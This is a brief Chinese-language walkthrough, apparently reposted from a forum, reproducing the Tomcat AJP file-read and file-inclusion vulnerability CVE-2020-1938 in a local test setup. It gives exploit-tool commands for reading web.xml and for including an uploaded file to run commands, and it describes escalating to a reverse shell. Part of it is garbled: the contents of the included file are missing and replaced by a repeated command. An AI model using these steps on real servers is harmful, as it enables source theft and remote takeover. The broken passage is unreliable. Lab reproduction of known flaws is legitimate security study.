CVE-2020-1938_Tomcat_文件读取&包含漏洞复现

手游

漏洞影响范围包括
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

一、使用工具：
https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
使用方法：
（文件读取）
python2 &quot;Tomcat-ROOT路径下文件读取(CVE-2020-1938).py&quot; -p 8009 -f /test.txt 127.0.0.1

（文件包含）
python2 &quot;Tomcat-ROOT路径下文件包含(CVE-2020-1938).py&quot; -p 8009 -f /test.txt 127.0.0.1

二、环境搭建
http://archive.apache.org/dist/tomcat/ 直接下载官方环境包

三、复现
1、使用文件读取，查看web源代码：
python2 &quot;Tomcat-ROOT路径下文件读取(CVE-2020-1938).py&quot; -p 8009 -f /WEB-INF/web.xml 127.0.0.1
注意，此时的目录为web根目录


2、如果存在上传功能，上传txt进行包含攻击；（这里由于是测试环境，就复制一个txt文件到根目录假冒上传；现实情况的话需要知道上传文件的路径）
这里上传的txt文件为”test.txt“
内容如下：[Java] 纯文本查看 复制代码
python2 &quot;Tomcat-ROOT路径下文件包含(CVE-2020-1938).py&quot; -p 8009 -f /test.txt 127.0.0.1


3、通过以上操作已经可以读取文件和执行命令了，接着就是反弹shell
反弹shell还是通过执行命令来实现的，具体操作为修改test.txt文件内容，将里边的命令修改为反弹的命令即可，这里需要注意的是，反弹命令需要到这个网站进行转换“http://www.jackson-t.ca/runtime-exec-payloads.html”



来源：http://www.12558.net
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！